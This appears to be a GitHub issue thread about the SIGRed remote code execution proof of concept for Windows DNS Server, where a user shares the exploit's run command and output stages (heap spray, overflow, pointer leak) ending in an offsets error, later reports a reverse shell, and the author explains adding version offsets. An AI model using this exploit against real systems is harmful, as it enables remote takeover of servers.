Could not find dns offsets

[Kedar59]

I am trying the exploit with conditional forwarding.
Output after running exploit.py :
$ sudo python3 exploit.py -ip 192.168.146.136 -d kedar.ee
[!] grooming small buffer size freelist
Waiting for small cached records to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120....125....130....135....140....145....150....155....160..163
[!] doing DNS record heap spray
[!] waiting for target subdomain record to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123
[!] triggering realloc and overflow
[!] triggering free for fake timeout object
[!] triggering timeout object allocations
[!] triggering frees for heap ptr leak
[!] triggering heap ptr leak
[+] controllable heap addr: 0x28acd3567d0
[!] waiting for timeout object allocation
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123
[!] triggering dns!RR_Free addr leak
[-] Could not find dns offsets!
DNS leak 64 file :

Windows version screen shot :

[Kedar59]

So I ran the exploit a few more times and each time it gives a different error and it seems random for some reason. But eventually it worked in one of my attempts and I got the reverse shell.

[chompie1337]

Please see supported versions section of the readme: https://github.com/chompie1337/SIGRed_RCE_PoC?tab=readme-ov-file#supported-versions You will have to add the offsets for the version you are targeting to offsets.py. At the time of this exploit I did not have access to every single vulnerable version of dns.exe and msvcrt.dll

…

On Wed, Jun 12, 2024 at 1:27 PM Kedar ***@***.***> wrote: I am trying the exploit with conditional forwarding. Output after running exploit.py : $ sudo python3 exploit.py -ip 192.168.146.136 -d kedar.ee [!] grooming small buffer size freelist Waiting for small cached records to be freed 0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120....125....130....135....140....145....150....155....160..163 [!] doing DNS record heap spray [!] waiting for target subdomain record to be freed 0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123 [!] triggering realloc and overflow [!] triggering free for fake timeout object [!] triggering timeout object allocations [!] triggering frees for heap ptr leak [!] triggering heap ptr leak [+] controllable heap addr: 0x28acd3567d0 [!] waiting for timeout object allocation 0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123 [!] triggering dns!RR_Free addr leak [-] Could not find dns offsets! DNS leak 64 file : dnsleak64.png (view on web) <https://github.com/chompie1337/SIGRed_RCE_PoC/assets/104148492/fc9b5b8d-6c50-4fe4-ad00-319b6b0747f7> Windows version screen shot : windows.server.version.png (view on web) <https://github.com/chompie1337/SIGRed_RCE_PoC/assets/104148492/9826488a-4210-4f07-9fee-548950f4c546> — Reply to this email directly, view it on GitHub <#16>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/ANOA267H5YOQCY6AHDXPWV3ZHCAIJAVCNFSM6AAAAABJGZUXQKVHI2DSMVQWIX3LMV43ASLTON2WKOZSGM2DSMZSGY3DMNY> . You are receiving this because you are subscribed to this thread.Message ID: ***@***.***>